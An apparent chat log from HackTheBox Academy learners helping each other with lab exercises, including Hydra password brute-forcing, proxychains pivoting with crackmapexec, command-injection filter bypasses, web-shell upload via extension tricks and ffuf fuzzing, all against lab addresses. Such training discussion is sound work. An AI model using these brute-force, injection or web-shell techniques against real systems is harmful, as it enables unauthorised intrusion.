Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-28 16:13:54
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 333 login tries (l:1/p:333), ~34 tries per task
[DATA] attacking pop3://10.129.99.110:110/
Hydra just stops after showing attacking
If I enable -vV it just shows resolving then exit
Annual sub or student sub; you lose access to it. If it's the other monthly subs that gives cubes; no
This contains spoilers dude
so even if I had initiated it, nothing?
Correct, access is lost
redacted
thanks
I think progress remains, but that's a question for support tbh
How long are you waiting
5 seconds or so then it just exits to console
Ok so it's exiting itself
Also -t and -T are different
-T is threads, -t is tasks per thread
Using -t since its 1 target only.
Anyway
I forget if you need to drop the @inlanefreight.htb for this
Sometimes you do, Sometimes you don't
According to the forums you need to include it
its been a minute ¯\_(ツ)_/¯
Although the issue seems to be a bug in hydra, should I try any other tool ?
Try with a different service
Like imap
I forget if imaps/pop3s is enabled on this lab
progress remains on all modules and sections you've completed, if you DID NOT complete the module fully you'll lose access
fun story i am now learning how to mount a bitlocker drive on linux
what the everliving fuck
hello, im trying to execute ./username-anarchy -I ./names.txt but i get this error
./username-anarchy: line 7: syntax error near unexpected token `newline'
./username-anarchy: line 7: `<!DOCTYPE html>'
line 7
How did you copy the tool?
That looks like, to me, you used wget or something and copied the webpage
yeah, i used wget
You can also use wget to download from the raw link, if you only need one file
thank you guys
i have to go back and redo all of that
that last lab was REALLY fun
i did things i didn't know my fingers were capable of
wait till lab 2 and 3
i completed both of them obviously... but if you think the SECTIONS are fun... oh buddy
https://academy.hackthebox.com/module/116/section/1173
Hydra just doesn't continue if I use pop3 as protocol
Imap and SMTP work but they don't have a valid login with the discovered username (using full email) m***@inlanefreight.htb, tried with the provided pws.list
Any ideas of what to do
hydra -l m**@inlanefreight.htb -P pws.txt pop3://10.... -t 10
hydra -l m**@inlanefreight.htb -P pws.list -f 10... pop3 -t 10
pop3 commands I have tried
digging obsidian
tasklist from powershell, and look for non standard .exe , or go to apps and features, and look for non-standard .exe
is there anybody around who has completed Skills Assessment - Hard from Abusing HTTP Misconfigurations? i'm 99% sure my exploit should work but i think i may be doing something slightly wrong here 😅
On Windows Privilege Escalation Skills Assessment - Part I do you have any ideas how i get CLSID? I used the GetCLSID tool from juicypotato, but i don't get it. 🙂
try different ones
I got it and i manged to escalate priv. 🙂
Attacking Common Services - Hard, i answered the first 3 questions, now the last one Submit the contents of the flag.txt file on the Administrator Desktop.
i tried to use the user john to login to the mssql server, but it doesn't work, should i try again there or something else?
Mssql is the right approach. Maybe revisit that section to see what you can do
make sure you're grabbing the right ticket
Any suggestions?
If your wordlist didn't crack anything, then it simply doesn't contain the password, you may want to try a different wordlist.
Hmm, pop3?
Hi guys! I have a problem with questions of Active Infrastructure Identification! I have the ip target and the vHosts needed for the questions, once i added the ip with the vHosts to /etc/hosts, if i try to ping the hosts i have all packets lost and i can't use whatweb...i'm connected to the VPN connection file! Can someone help me?
Which protocol?
Were you able to solve this? I am stuck here as well.
The other mail protocol
smtp?
I use tcp protocol in the vpn file
Worked finally, thanks.
Did you add them properly
into the thick client application section where most ppl complain about

yes, i just added two new lines with the IP spawned and the names of the vHosts
Howdy yall, not sure if this is the right place to ask questions but, im quite new to all this stuff, dont really have much knowledge even on basic stuff, and i found myself kinda stuck while setting up my VM (virtual box), when I start the program it says "please insert a bootable medium and reboot". Does anyone have an idea of what could be the issue?
How did you add it/screenshot
Well you need to use an iso to install a vm.
I followed this one tutorial and also installed Kali and another thing, is that what you're referring to?
no idea what you're talking about ¯\_(ツ)_/¯
kali has pre-made VMs that you can download and instantly boot into
Kali also has pre-built vms for different vm software
i prefer setting up my own VM and then making a gold image out of it
no need for the two lines, just put all domain names on the same IP
okay ill see what i can do thanks
10.129.151.212 app.inlanefreight.local dev.inlanefreight.local
I changed the protocol of the vpn file from tcp to udp and now it works, i can ping
Working on https://academy.hackthebox.com/module/163/section/1549
And getting this output for crackmapexec:
┌──(kali㉿kali)-[/]
└─$ proxychains crackmapexec smb 172.16.8.3 -u ssmalls -p Str0ngpass86!
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:8081 ... 127.0.0.1:8080 ... 172.16.8.3:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:8081 ... 127.0.0.1:8080 ... 172.16.8.3:445 ... OK
Not sure what I'm missing here that I'm not getting the SMB response 🤔
i've only seen no response from cme when it isn't connecting
what's the response? those the proxychains output, use it with -q to disable them
There is no response, and when I hit it with the --verbose flag I'm seeing:
DEBUG Error creating SMBv3 connection to 172.16.8.3: ("Unpacked data doesn't match constant value ...
Along with a bunch of HTML? As if it's using the wrong protocol (unless that HTML is part of the debugger?)?
I'm quite sure cme doesn't output html, make sure your proxychains config is correct and maybe reset the target
I've tried resetting a couple times, and proxychains looks fine to the best of my knowledge (which isn't much).
Do I need more than socks5 127.0.0.1 8081 and I'm just dumb?
sudo ssh -D 8081 -i dmz01_key root@10.129.28.242
Just been following the instructions verbatim with no issues until this 🤷
as i said, i've only seen cme not provide output when there is some kind of connectivity error. i would start by going over every IP address and hostname that's going into the equation here to use CME, including your proxy configuration, your vpn connectivity if you're using a vm, the ip of the victim, etc
generally you aren't going to be able to straight copy/paste things from the module because the IP address that spawns on your victim will be different, or the machine at the end will be slightly different so you can have first hand experience using the commands yourself as it helps reinforce learning
Yeah, fair enough. I'm almost positive it has to be something borked with my config.
That being said, in this scenario the IPs are consistent. It's far from the first box I've worked through so give me some (though not much) credit 😛
But yeah, I get what you're saying. Might just start over blank slate and see if I can recreate 🤷
if you're using a vm, you can also try on the pwnbox, as the pwnbox is usually just setup with all the tools working etc.
it's also a good way to test if it's a problem with your computer or the config, because if both boxes have the same result it means you're not doing something right
Good call, I'll try that out.
Hello, who has worked with the crowdtap page
Is this a good place to reach out on for "Command Injections" module?
yeah just ask your question
I am struggling to obfuscate the payload for the Skill assessment section.
Does the payload go right here?
GET /index.php?to=tmp&from=51459716.txt{payload} HTTP/1.1
i believe that's covered under the "Injecting Commands" section
you have to find it
A lot is getting caught as "Malicious"
I guess what I am asking, is would I be able to execute an arbitrary command like whoami?
well the whole module is about command injection, so yes, once you find the injection point and are able to bypass the defenses you could run whoami or any other system command
it's like a puzzle you have to try different combinations of bypasses and figure it out
File Upload Attacks: Type Filters
-OK so I used the bash script to get all the various extensions to try ( currently using shell.%00php.jpg ) and the file uploads, the issue I'm having is once I go to the url: (IP:port/profile_images/shell.%00php.jpg?cmd=id) I get 404 URL Not Found. Just looking for help on if I'm missing something. Thanks
did your bash script give you any more options?
yes, it gave 224 variations. Do I need to just pick one fuzz that, like just .phar and just .jpg and go through those?
null bytes can mess with filenames and lead to unpredictable results, so you might want to try something else
especially if it isn't working
Ok I appreciate the help, any other references you can point out cuz im on day 3 of this and it's starting to feel like OSCP training all over again lol
"Attacking Web Applications with Ffuf" module filtering section is not working
Gave me status 200 for all of my wordlist
Is there a different wordlist needed other than the one recommended in the module?
dm me and i can give some tips
Or is it just broken?
i haven't done that module but if ffuf was successful in completing the list and found nothing, yeah i'd try another list personally
No it gave a 200 for everything in the list
Lab is broken
What's the ffuf command you ran?
Check the content length
Lab isnt broken
You need to filter size , it is also explained why its gives 200 response
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://academy.htb:36987 -H 'Host: FUZZ.academy.htb' -fs 900
didn't get anything
instead of copying the command from the module exactly, why don't you look at the output on how you should set the size?
Yeah, I figured it out eventually. Command in the module was wrong.
Also, filtering that way with the actual command still hasn't completed, even though I found it in 30 seconds scrolling
Hello, I want someone to recover my Snapchat account in exchange for money
Refresh page and clear client-side browser session. Basic stuff and it should work. If you dont want to clear history, try a private browser, disable vpn, and sign in.
Otherwise give it some time. It's thinkin 
giving it time works but it took 40 min off
yeah i tried all that before coming here
That will happen. In the meantime, you should find other productive ways to optimize your time so you can do better/work quicker~.
It's not an answer I like to say, but a required answer.
(85% CPTS Completed)
My favorite is when it doesn't spawn (the VM instance) ;D
Or when the VM spawns, but it doesn't full screen during an RDP sesh with windows.
DETECTING WINDOWS ATTACKS WITH SPLUNK : Detecting Beaconing Malware
*"Use the "cobaltstrike_beacon" index and the "bro:http:json" sourcetype. What is the most straightforward Splunk command to pinpoint beaconing from the 10.0.10.20 source to the 192.168.151.181 destination? Answer format: One word" *
i don't think i am missing anything here but i really can't find this answer, if anyone can give a hint for me that would be really nice 😬
google splunk time function
No. Reach out to Snapchat support
this is not a hacker-for-hire place
Can someone please DM me about Injection Attacks - pdf generation section ? I swear I've tried everything but I'm clearly missing something
edit: indeed I did miss something. Got it now 👍
haha so easy it was HARD thanks for hint!
folks, I am in the Pivot and Tunneling module
I see we can use nmap without proxychains. But we set it up for RDP and SMB
why is that? because RDP and SMB do not work without it?
specifically speaking, I see how the module uses ssh with -L and socks, then runs nmap to scan the MySQL port which is filtered
proxychains was not set for that
what? do you have a specific example? that is very vague
Pivot, Tunneling and port forwarding Module
Dynamic port fwd section
the 1st example uses nmap without proxychains
nmap -v -sV -p1234 localhost
I mean, the paragraph after that explains it very clearly, the sql port is only open on the target's localhost, so you're doing a local port forward to open the sql port on port 1234
is not clear to me
I know MySQL is open on the pivot box
we use the ssh -L to bind the port
but we do not edit proxychains.conf
why
in other words, because the open port is on the pivot box, we don't need proxychains? is that the reason?
proxychains is for dynamic port forwarding with SOCKS, you don't use proxychains with a local port forward
got it
so the answer is... because the open port is on the pivot box... not the internal box
idk how you're defining the pivot box and internal box, check the diagrams in the section
I can't find a payload that works for command injection while I use what they show in the course, I tried a lot of payloads, trying several such as ls -la, ls, echo, encoding characters like in URLs.
what section/question is that
There's a tip in the module to remove everything but the first character, see if that trips the filter. if not, add another character and try again. keep doing that until you find what's causing the invalid command and make a workaround for it.
doing that method should tell you exactly what is not working
I didn't understand xd.
start by adding 1 character at a time
see if ip=127.0.0.1$ makes it say Invalid Input, if not, add ip=127.0.0.1${, then ip=127.0.0.1${L, then ip=127.0.0.1${LS
keep going until it says invalid input, then you know what is causing it to fail
Okay!
no, before you got 'invalid input', indicating the ping command never went off, so the command wasn't passed to the system. now that you've removed some characters, the ping goes through.
No, I tried without any command and this var was working, now no...
so it accepts those characters, keep adding more, one by one, till you find what's stopping it
well your screenshots tell a different story
stronger filter, change your method
It was THIS exercise...
maybe reboot it then
your command is something like 127.0.01 ls /home :). Try this on your local machine and see if the command it's working. And if not, think why it's not working. 🙂
Look:
I have no error, no input validation error, just ping cmd :/.
I tried with PATH var env as well.
And I have nothing sometimes with printf due to echo isn't working.
I think you need an escape like ; && ||...
I will try bypass echo with something like : $(rev<<<"sl")
try to use path instead of ls_colors
LS_COLORS is to have ;.
It does not come from it.
Just I will bypass echo blacklist.
dont use the env variable as your injection operator.
I tried &&, ||, ; encoded or no = not working.
try the new line one
use the url encoded version
Yeah I know, I'll try it.
could anybody give me a hint for the Attacking Common Services - Hard last question. i logged in with smbclient and found the users. now i try to log in to the mssql server with the creds i found, but it is not working.
that should work unless youre whole command is wrong
you are overcomplicating things.
But I am not getting any error.
?
you want to read /home right?
you have found a working injection operator: %0a
now you how do you combine the commands to read the dir.?
use the environmental var shown in the section.
why are you adding $ to ls?
echo it's not working and printf as well.
$() = open a subshell, just for readability.
just use ls
ls then the space env variable plus the home env variable
Bro, why before it was not working 😭.
one more command
you should have just started with one command after the other.
was it the same commands?
that is blacklisted I think
from the screenshots you sent, you used ls as an env var, $ls
AH did not notice.
could anybody give me a hint for the Attacking Common Services - Hard last question. i logged in with smbclient and found the users. now i try to log in to the mssql server with the creds i found, but it is not working. i was also able to rdp with the user fiona
try a different auth method.
mssql has 2 modes of authentication...
with the user fiona?
yeah
i am facing issue with password attacks module
hydra -L username.list -P password.list ssh://10.129.202.136
Where to get roles?
But why not use the cli or impacket?
Don't attack ssh
i use the above command to bruteforce the ssh login credentials but i got the error:
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-29 10:59:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21008 login tries (l:104/p:202), ~1313 tries per task
[DATA] attacking ssh://10.129.202.136:22/
[ERROR] could not connect to ssh://10.129.202.136:22 - Timeout connecting to 10.129.202.136
Are you connected to the vpn?
yes i am using pwnbox , cloud instance
i can ping the machine ip
Then: attack a different service
check ssh port. 🙂
Using hydra to attack ssh is painfully slow
i am new on htb academy, i connect the vpn on my kali linux and try to get the credentials using hydra, evil-winrm etc but nothing works
There are other services running that will be better
also i tried to start a pwnbox instance but nothing works
Don't run the vpn and the in-browser pwnbox at the same time
And 2: when you connect to the vpn you need to open a new terminal to do anything
yes, i know this basic stuff. as i said i can ping the machine, i can view the open ports using nmap, i even cross-checked using the telnet utility. well i'll try again and let you know the status.
